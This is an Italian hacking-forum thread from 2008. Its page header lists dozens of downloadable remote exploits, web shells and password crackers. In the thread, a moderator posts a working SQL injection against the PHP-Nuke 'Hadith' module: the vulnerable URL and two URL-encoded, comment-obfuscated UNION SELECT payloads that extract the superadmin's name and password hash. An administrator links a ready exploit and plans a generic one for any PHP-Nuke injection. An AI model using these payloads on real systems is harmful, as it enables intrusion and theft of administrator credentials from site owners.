RBT-4 Network

RBT-4 Network

Home :: Forum :: Downloads :: Cerca :: No-Paste :: Exploits :: RBT-4 XSS DB :: IT Wardriving DB :: S.Code Bug Finder

4005318 hits

:: [PDF] - Storia e realtà dell' Hacker italiano :: [PDF] - Sicurezza nella navigazione :: PyGTK - Programmazione Python GUI - Italiano :: Sicurezza nelle Wireless LAN - Giuseppe Paternò :: Il TCP/IP e la trasmissione dati su Internet :: Il linguaggio C - Guida pratica alla programmazione :: UnHash - MD5 or SHA1 Bruteforcer :: MD5 cracker BarsWF :: Joomla Security Scanner :: MySQL 64Bit HASH - Bruteforcer :: The Art Of Assembly Language - DOS16 Special Edition :: The Art Of Assembly Language - LINUX Special Edition :: The Art Of Assembly Language - Win32 Special Edition :: Carnivore-PersonalEdition+Source Code :: Sql-Injection Scanners + Guide alle Sql-Inj :: Huge Hackers Toolkit Suite 2006 - 48in1 (AIO) :: MSN Hacks All In One :: Web Shells Pack :: Man-in-the-middle attack (by blackhats security team) :: I Netowork X.25, comprensione della struttura di rete, tecniche di attacco ed identificazione delle :: Social Engeenering, una guida introduttiva (by blackhats security team) :: IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit :: Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3) :: Rational Software Hidden Administrator 1.7 Auth Bypass Exploit :: TinyIdentD <= 2.2 Remote Buffer Overflow Exploit :: webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield) :: webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit :: GNU Mailutils imap4d 0.6 Remote Format String Exploit (exec-shield) :: MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2 :: MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit :: XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit :: MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) :: Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32) :: FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2) :: IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit :: IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit :: dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx) :: CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit :: NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta) :: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4) :: WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets) :: Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit :: dproxy <= 0.5 Remote Buffer Overflow Exploit (meta 2.7) :: FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit :: Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod) :: Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4) :: Helix Server 11.0.1 Remote Heap Overflow Exploit (win2k SP4) :: CA BrightStor ARCserve (msgeng.exe) Remote Stack Overflow Exploit :: WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit :: WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4) :: MailEnable Pro/Ent <= 2.37 (APPEND) Remote Buffer Overflow Exploit :: 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Exploit (perl) :: IPSwitch WS-FTP 5.05 (XMD5) Remote Buffer Overflow Exploit (meta) :: Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit :: MailEnable Professional 2.35 Remote Buffer Overflow Exploit :: MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit :: Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit :: IP3 NetAccess < 4.1.9.6 Remote Arbitrary File Disclosure Vulnerability :: SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit :: MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win) :: Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit (meta) :: Imail 8.10-8.12 (RCPT TO) Remote Buffer Overflow Exploit :: CA BrightStor ARCserve (lgserver.exe) Remote Stack Overflow Exploit :: CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit 2 :: CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit :: 3Com TFTP Service <= 2.0.1 Remote Buffer Overflow Exploit (meta) :: Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit :: Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit :: TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit :: FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) :: Berlios GPSD <= 2.7 Remote Format String Exploit (meta) :: NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta :: CA BrightStor ARCserve (tapeeng.exe) Remote Buffer Overflow Exploit :: QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit (pl) :: Durian Web Application Server 3.02 Remote Buffer Overflow Exploit :: MS Windows ASN.1 Remote Exploit (MS04-007) :: ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit :: GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit :: OpenLDAP <= 2.4.3 (KBIND) Remote Buffer Overflow Exploit :: AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit :: 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit :: ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta) :: MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) :: Omni-NFS Server 5.2 (nfsd.exe) Remote Stack Overflow Exploit (meta) :: Easy File Sharing Web Server 4 Remote Information Stealer Exploit :: PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32) :: Novell eDirectory 8.8 NDS Server Remote Stack Overflow Exploit :: QK SMTP <= 3.01 (RCPT TO) Remote Buffer Overflow Exploit :: AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit :: Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit :: McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit :: NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit :: MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) :: Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2) :: RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit :: IBM Director < 5.10 (Redirect.bat) Directory Transversal Vulnerability :: MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) :: MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit :: Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (PoC) :: WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit ::

RBT-4 Network \| I NOSTRI PROGETTI \| I VOSTRI EXPLOIT
	Visualizza tutti i messaggi non letti

Autore PHP-Nuke Module "Hadith" [cat] Sql injection

lovebug
Moderatore

Avatar Utente

Messaggi: 968
Iscritto: 07.04.07

Scritto il 08-03-2008 21:27

Il bug è presente nel modulo Hadith [cat]

modload&name=Hadith&file=index&action=viewcat&cat= [SQL]

Exploit:

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A



-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Modificato da lovebug il 09-03-2008 03:18

Invia Messaggio Privato

Autore RE: PHP-Nuke Module "Hadith" [cat] Sql injection

fxhaxor
Membro

Messaggi: 109
Provenienza: /dev/null
Iscritto: 25.02.08

Scritto il 08-03-2008 22:35

bella!!!

complimenti lovebug!!!!

ps. attento di non esagerare con il bug hunting altrimenti ti scoppia il cervello xD

...le solite cose...

Invia Messaggio Privato

Autore RE: PHP-Nuke Module "Hadith" [cat] Sql injection

Gianluka_95
Membro

Messaggi: 642
Provenienza: Aldilà dell' universo
Iscritto: 17.10.07

Scritto il 08-03-2008 23:02

è inutile vero love ? tra poco te lo sposi il phpnuke
adesso r080 ti fa l' exploit e bla bla bla XD
skerzo ovviamente ma sai ci stiamo abituando XD
COMPLIMENTIIIIIIIIIIIIIIIII

Invia Messaggio Privato

Autore RE: PHP-Nuke Module "Hadith" [cat] Sql injection

lovebug
Moderatore

Avatar Utente

Messaggi: 968
Iscritto: 07.04.07

Scritto il 09-03-2008 03:21

gia' sn scoppiato

Invia Messaggio Privato

Autore RE: PHP-Nuke Module "Hadith" [cat] Sql injection

r080cy90r
Amministratore

Avatar Utente

Messaggi: 5703
Iscritto: 25.11.06

Scritto il 09-03-2008 03:56

Eh certo io e Lovebug famo coppia fissa in queste cose, almeno , ormai facciamo coppia fissa, lui trova il bug e io , modificando lo stesso exploit un pochino, con le pagine e variabili che cambiano scrivo l'exploit...LOL....quasi quasi ne scrivo uno totalmente libero, nel senso che tu devi inserire oltre ai soliti dati anche la pagina buggata con le variabili e tutto il resto, in questo modo l'exploit funzionerebbe per ogni tipo di sqlinjection su phpnuke LOL!...mo appena ho tempo ne scrivo uno nuovo cosi come ho detto, cosi per ogni bug che trovi non dovro postarne sempre uno diverso, bastera quello per ognuno dei bug..beh non è una brutta idea vero...vabbe:

PHP-NUKE Module Hadith [cat] => SQL Injection
http://www.rbt-4.net/nopaste/viewnopaste.php?id=6752721

Comunque Lovebug, Ottimo Lavoro , come sempre del resto...

Passo e Chiudo!

REGOLAMENTO:=> http://www.rbt-4.net/forum/viewthread.php?forum_id=56&thread_id=231 <=:TUTTI DEVONO RISPETTARLO

REGOLAMENTO:=> http://www.rbt-4.net/forum/viewthread.php?forum_id=13&thread_id=1036 <=:TUTTI DEVONO RISPETTARLO

Sei stanco? Tutti ti vogliono male? Odi tutti? Il tuo punto di vista non è gradito? La comunita di rbt-4 non ti capisce? Non ti piace il regolamento?
È in atto un complotto massonico-demo-pluto-giudaico ai danni di rbt-4 e nessuno coglie il tuo grido di dolore?
Ricordati:La community di Rbt-4 non è obbligatoria, siamo sicuri che nel mondo là fuori troverai qualcosa di alternativo e di divertente da fare.
(Quella illuminata là in fondo è la porta. Grazie, conserveremo un buon ricordo di te.)

la rete e' la tela spetta a noi usare la giusta tecnica per dipingerla!
r080cy90r w4n7 70 p41n7!!!

Modificato da r080cy90r il 09-03-2008 04:09

mandami_un_pm@rbt4.net

Invia Messaggio Privato

Vai al Forum: